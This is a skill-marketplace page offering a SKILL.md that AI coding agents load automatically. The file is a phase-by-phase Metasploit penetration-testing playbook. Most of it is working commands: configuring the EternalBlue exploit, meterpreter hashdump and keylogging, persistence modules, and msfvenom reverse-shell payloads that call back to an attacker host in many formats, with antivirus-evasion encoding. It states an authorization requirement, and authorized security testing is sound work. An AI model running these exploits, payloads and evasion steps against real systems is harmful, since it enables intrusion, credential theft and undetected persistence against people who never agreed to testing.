How do I install Metasploit Framework?

Install Metasploit Framework with a single command: npx mdskills install sickn33/metasploit-framework. This downloads the skill files into your project and your AI agent picks them up automatically.

What platforms support Metasploit Framework?

Metasploit Framework works with Claude Code, Claude Desktop, Cursor, Vscode Copilot, Windsurf, Continue Dev, Codex, Gemini Cli, Amp, Roo Code, Goose, Opencode, Trae, Qodo, Command Code. Skills use the open SKILL.md format which is compatible with any AI coding agent that reads markdown instructions.

← Back to skills

Metasploit Framework

Name: Metasploit Framework: AI Agent Skill
Rating: 8 (1 reviews)
Author: sickn33

Verified

SecurityIntermediate

This skill should be used when the user asks to "use Metasploit for penetration testing", "exploit vulnerabilities with msfconsole", "create payloads with msfvenom", "perform post-exploitation", "use auxiliary modules for scanning", or "develop custom exploits". It provides comprehensive guidance for leveraging the Metasploit Framework in security assessments.

by @sickn330Updated 2 weeks ago

Add this skill

npx mdskills install sickn33/metasploit-framework

Fork & Edit

Skill Advisor8.0

Comprehensive pentesting skill with detailed phase-based workflows and extensive command references

+Provides exhaustive command reference tables and practical examples for all Metasploit components
+Structures workflow into logical phases from basics through post-exploitation
+Includes proper authorization prerequisites and ethical testing requirements
-Lacks specific trigger conditions for when to use each module type or escalation path
-Does not provide guidance on documentation or reporting findings to stakeholders

SKILL.md

Edit in Browser

1---
2name: Metasploit Framework
3description: This skill should be used when the user asks to "use Metasploit for penetration testing", "exploit vulnerabilities with msfconsole", "create payloads with msfvenom", "perform post-exploitation", "use auxiliary modules for scanning", or "develop custom exploits". It provides comprehensive guidance for leveraging the Metasploit Framework in security assessments.
4metadata:
5  author: zebbern
6  version: "1.1"
7---
8 
9# Metasploit Framework
10 
11## Purpose
12 
13Leverage the Metasploit Framework for comprehensive penetration testing, from initial exploitation through post-exploitation activities. Metasploit provides a unified platform for vulnerability exploitation, payload generation, auxiliary scanning, and maintaining access to compromised systems during authorized security assessments.
14 
15## Prerequisites
16 
17### Required Tools
18```bash
19# Metasploit comes pre-installed on Kali Linux
20# For other systems:
21curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
22chmod 755 msfinstall
23./msfinstall
24 
25# Start PostgreSQL for database support
26sudo systemctl start postgresql
27sudo msfdb init
28```
29 
30### Required Knowledge
31- Network and system fundamentals
32- Understanding of vulnerabilities and exploits
33- Basic programming concepts
34- Target enumeration techniques
35 
36### Required Access
37- Written authorization for testing
38- Network access to target systems
39- Understanding of scope and rules of engagement
40 
41## Outputs and Deliverables
42 
431. **Exploitation Evidence** - Screenshots and logs of successful compromises
442. **Session Logs** - Command history and extracted data
453. **Vulnerability Mapping** - Exploited vulnerabilities with CVE references
464. **Post-Exploitation Artifacts** - Credentials, files, and system information
47 
48## Core Workflow
49 
50### Phase 1: MSFConsole Basics
51 
52Launch and navigate the Metasploit console:
53 
54```bash
55# Start msfconsole
56msfconsole
57 
58# Quiet mode (skip banner)
59msfconsole -q
60 
61# Basic navigation commands
62msf6 > help                    # Show all commands
63msf6 > search [term]           # Search modules
64msf6 > use [module]            # Select module
65msf6 > info                    # Show module details
66msf6 > show options            # Display required options
67msf6 > set [OPTION] [value]    # Configure option
68msf6 > run / exploit           # Execute module
69msf6 > back                    # Return to main console
70msf6 > exit                    # Exit msfconsole
71```
72 
73### Phase 2: Module Types
74 
75Understand the different module categories:
76 
77```bash
78# 1. Exploit Modules - Target specific vulnerabilities
79msf6 > show exploits
80msf6 > use exploit/windows/smb/ms17_010_eternalblue
81 
82# 2. Payload Modules - Code executed after exploitation
83msf6 > show payloads
84msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp
85 
86# 3. Auxiliary Modules - Scanning, fuzzing, enumeration
87msf6 > show auxiliary
88msf6 > use auxiliary/scanner/smb/smb_version
89 
90# 4. Post-Exploitation Modules - Actions after compromise
91msf6 > show post
92msf6 > use post/windows/gather/hashdump
93 
94# 5. Encoders - Obfuscate payloads
95msf6 > show encoders
96msf6 > set ENCODER x86/shikata_ga_nai
97 
98# 6. Nops - No-operation padding for buffer overflows
99msf6 > show nops
100 
101# 7. Evasion - Bypass security controls
102msf6 > show evasion
103```
104 
105### Phase 3: Searching for Modules
106 
107Find appropriate modules for targets:
108 
109```bash
110# Search by name
111msf6 > search eternalblue
112 
113# Search by CVE
114msf6 > search cve:2017-0144
115 
116# Search by platform
117msf6 > search platform:windows type:exploit
118 
119# Search by type and keyword
120msf6 > search type:auxiliary smb
121 
122# Filter by rank (excellent, great, good, normal, average, low, manual)
123msf6 > search rank:excellent
124 
125# Combined search
126msf6 > search type:exploit platform:linux apache
127 
128# View search results columns:
129# Name, Disclosure Date, Rank, Check (if it can verify vulnerability), Description
130```
131 
132### Phase 4: Configuring Exploits
133 
134Set up an exploit for execution:
135 
136```bash
137# Select exploit module
138msf6 > use exploit/windows/smb/ms17_010_eternalblue
139 
140# View required options
141msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
142 
143# Set target host
144msf6 exploit(...) > set RHOSTS 192.168.1.100
145 
146# Set target port (if different from default)
147msf6 exploit(...) > set RPORT 445
148 
149# View compatible payloads
150msf6 exploit(...) > show payloads
151 
152# Set payload
153msf6 exploit(...) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
154 
155# Set local host for reverse connection
156msf6 exploit(...) > set LHOST 192.168.1.50
157msf6 exploit(...) > set LPORT 4444
158 
159# View all options again to verify
160msf6 exploit(...) > show options
161 
162# Check if target is vulnerable (if supported)
163msf6 exploit(...) > check
164 
165# Execute exploit
166msf6 exploit(...) > exploit
167# or
168msf6 exploit(...) > run
169```
170 
171### Phase 5: Payload Types
172 
173Select appropriate payload for the situation:
174 
175```bash
176# Singles - Self-contained, no staging
177windows/shell_reverse_tcp
178linux/x86/shell_bind_tcp
179 
180# Stagers - Small payload that downloads larger stage
181windows/meterpreter/reverse_tcp
182linux/x86/meterpreter/bind_tcp
183 
184# Stages - Downloaded by stager, provides full functionality
185# Meterpreter, VNC, shell
186 
187# Payload naming convention:
188# [platform]/[architecture]/[payload_type]/[connection_type]
189# Examples:
190windows/x64/meterpreter/reverse_tcp
191linux/x86/shell/bind_tcp
192php/meterpreter/reverse_tcp
193java/meterpreter/reverse_https
194android/meterpreter/reverse_tcp
195```
196 
197### Phase 6: Meterpreter Session
198 
199Work with Meterpreter post-exploitation:
200 
201```bash
202# After successful exploitation, you get Meterpreter prompt
203meterpreter >
204 
205# System Information
206meterpreter > sysinfo
207meterpreter > getuid
208meterpreter > getpid
209 
210# File System Operations
211meterpreter > pwd
212meterpreter > ls
213meterpreter > cd C:\\Users
214meterpreter > download file.txt /tmp/
215meterpreter > upload /tmp/tool.exe C:\\
216 
217# Process Management
218meterpreter > ps
219meterpreter > migrate [PID]
220meterpreter > kill [PID]
221 
222# Networking
223meterpreter > ipconfig
224meterpreter > netstat
225meterpreter > route
226meterpreter > portfwd add -l 8080 -p 80 -r 10.0.0.1
227 
228# Privilege Escalation
229meterpreter > getsystem
230meterpreter > getprivs
231 
232# Credential Harvesting
233meterpreter > hashdump
234meterpreter > run post/windows/gather/credentials/credential_collector
235 
236# Screenshots and Keylogging
237meterpreter > screenshot
238meterpreter > keyscan_start
239meterpreter > keyscan_dump
240meterpreter > keyscan_stop
241 
242# Shell Access
243meterpreter > shell
244C:\Windows\system32> whoami
245C:\Windows\system32> exit
246meterpreter >
247 
248# Background Session
249meterpreter > background
250msf6 exploit(...) > sessions -l
251msf6 exploit(...) > sessions -i 1
252```
253 
254### Phase 7: Auxiliary Modules
255 
256Use auxiliary modules for reconnaissance:
257 
258```bash
259# SMB Version Scanner
260msf6 > use auxiliary/scanner/smb/smb_version
261msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.1.0/24
262msf6 auxiliary(...) > run
263 
264# Port Scanner
265msf6 > use auxiliary/scanner/portscan/tcp
266msf6 auxiliary(...) > set RHOSTS 192.168.1.100
267msf6 auxiliary(...) > set PORTS 1-1000
268msf6 auxiliary(...) > run
269 
270# SSH Version Scanner
271msf6 > use auxiliary/scanner/ssh/ssh_version
272msf6 auxiliary(...) > set RHOSTS 192.168.1.0/24
273msf6 auxiliary(...) > run
274 
275# FTP Anonymous Login
276msf6 > use auxiliary/scanner/ftp/anonymous
277msf6 auxiliary(...) > set RHOSTS 192.168.1.100
278msf6 auxiliary(...) > run
279 
280# HTTP Directory Scanner
281msf6 > use auxiliary/scanner/http/dir_scanner
282msf6 auxiliary(...) > set RHOSTS 192.168.1.100
283msf6 auxiliary(...) > run
284 
285# Brute Force Modules
286msf6 > use auxiliary/scanner/ssh/ssh_login
287msf6 auxiliary(...) > set RHOSTS 192.168.1.100
288msf6 auxiliary(...) > set USER_FILE /usr/share/wordlists/users.txt
289msf6 auxiliary(...) > set PASS_FILE /usr/share/wordlists/rockyou.txt
290msf6 auxiliary(...) > run
291```
292 
293### Phase 8: Post-Exploitation Modules
294 
295Run post modules on active sessions:
296 
297```bash
298# List sessions
299msf6 > sessions -l
300 
301# Run post module on specific session
302msf6 > use post/windows/gather/hashdump
303msf6 post(windows/gather/hashdump) > set SESSION 1
304msf6 post(...) > run
305 
306# Or run directly from Meterpreter
307meterpreter > run post/windows/gather/hashdump
308 
309# Common Post Modules
310# Credential Gathering
311post/windows/gather/credentials/credential_collector
312post/windows/gather/lsa_secrets
313post/windows/gather/cachedump
314post/multi/gather/ssh_creds
315 
316# System Enumeration
317post/windows/gather/enum_applications
318post/windows/gather/enum_logged_on_users
319post/windows/gather/enum_shares
320post/linux/gather/enum_configs
321 
322# Privilege Escalation
323post/windows/escalate/getsystem
324post/multi/recon/local_exploit_suggester
325 
326# Persistence
327post/windows/manage/persistence_exe
328post/linux/manage/sshkey_persistence
329 
330# Pivoting
331post/multi/manage/autoroute
332```
333 
334### Phase 9: Payload Generation with msfvenom
335 
336Create standalone payloads:
337 
338```bash
339# Basic Windows reverse shell
340msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe -o shell.exe
341 
342# Linux reverse shell
343msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f elf -o shell.elf
344 
345# PHP reverse shell
346msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f raw -o shell.php
347 
348# Python reverse shell
349msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f raw -o shell.py
350 
351# PowerShell payload
352msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f psh -o shell.ps1
353 
354# ASP web shell
355msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f asp -o shell.asp
356 
357# WAR file (Tomcat)
358msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f war -o shell.war
359 
360# Android APK
361msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -o shell.apk
362 
363# Encoded payload (evade AV)
364msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe -o encoded.exe
365 
366# List available formats
367msfvenom --list formats
368 
369# List available encoders
370msfvenom --list encoders
371```
372 
373### Phase 10: Setting Up Handlers
374 
375Configure listener for incoming connections:
376 
377```bash
378# Manual handler setup
379msf6 > use exploit/multi/handler
380msf6 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
381msf6 exploit(multi/handler) > set LHOST 192.168.1.50
382msf6 exploit(multi/handler) > set LPORT 4444
383msf6 exploit(multi/handler) > exploit -j
384 
385# The -j flag runs as background job
386msf6 > jobs -l
387 
388# When payload executes on target, session opens
389[*] Meterpreter session 1 opened
390 
391# Interact with session
392msf6 > sessions -i 1
393```
394 
395## Quick Reference
396 
397### Essential MSFConsole Commands
398 
399| Command | Description |
400|---------|-------------|
401| `search [term]` | Search for modules |
402| `use [module]` | Select a module |
403| `info` | Display module information |
404| `show options` | Show configurable options |
405| `set [OPT] [val]` | Set option value |
406| `setg [OPT] [val]` | Set global option |
407| `run` / `exploit` | Execute module |
408| `check` | Verify target vulnerability |
409| `back` | Deselect module |
410| `sessions -l` | List active sessions |
411| `sessions -i [N]` | Interact with session |
412| `jobs -l` | List background jobs |
413| `db_nmap` | Run nmap with database |
414 
415### Meterpreter Essential Commands
416 
417| Command | Description |
418|---------|-------------|
419| `sysinfo` | System information |
420| `getuid` | Current user |
421| `getsystem` | Attempt privilege escalation |
422| `hashdump` | Dump password hashes |
423| `shell` | Drop to system shell |
424| `upload/download` | File transfer |
425| `screenshot` | Capture screen |
426| `keyscan_start` | Start keylogger |
427| `migrate [PID]` | Move to another process |
428| `background` | Background session |
429| `portfwd` | Port forwarding |
430 
431### Common Exploit Modules
432 
433```bash
434# Windows
435exploit/windows/smb/ms17_010_eternalblue
436exploit/windows/smb/ms08_067_netapi
437exploit/windows/http/iis_webdav_upload_asp
438exploit/windows/local/bypassuac
439 
440# Linux
441exploit/linux/ssh/sshexec
442exploit/linux/local/overlayfs_priv_esc
443exploit/multi/http/apache_mod_cgi_bash_env_exec
444 
445# Web Applications
446exploit/multi/http/tomcat_mgr_upload
447exploit/unix/webapp/wp_admin_shell_upload
448exploit/multi/http/jenkins_script_console
449```
450 
451## Constraints and Limitations
452 
453### Legal Requirements
454- Only use on systems you own or have written authorization to test
455- Document all testing activities
456- Follow rules of engagement
457- Report all findings to appropriate parties
458 
459### Technical Limitations
460- Modern AV/EDR may detect Metasploit payloads
461- Some exploits require specific target configurations
462- Firewall rules may block reverse connections
463- Not all exploits work on all target versions
464 
465### Operational Security
466- Use encrypted channels (reverse_https) when possible
467- Clean up artifacts after testing
468- Avoid detection by monitoring systems
469- Limit post-exploitation to agreed scope
470 
471## Troubleshooting
472 
473| Issue | Solutions |
474|-------|-----------|
475| Database not connected | Run `sudo msfdb init`, start PostgreSQL, then `db_connect` |
476| Exploit fails/no session | Run `check`; verify payload architecture; check firewall; try different payloads |
477| Session dies immediately | Migrate to stable process; use stageless payload; check AV; use AutoRunScript |
478| Payload detected by AV | Use encoding `-e x86/shikata_ga_nai -i 10`; use evasion modules; custom templates |
479

Full transparency — inspect the skill content before installing.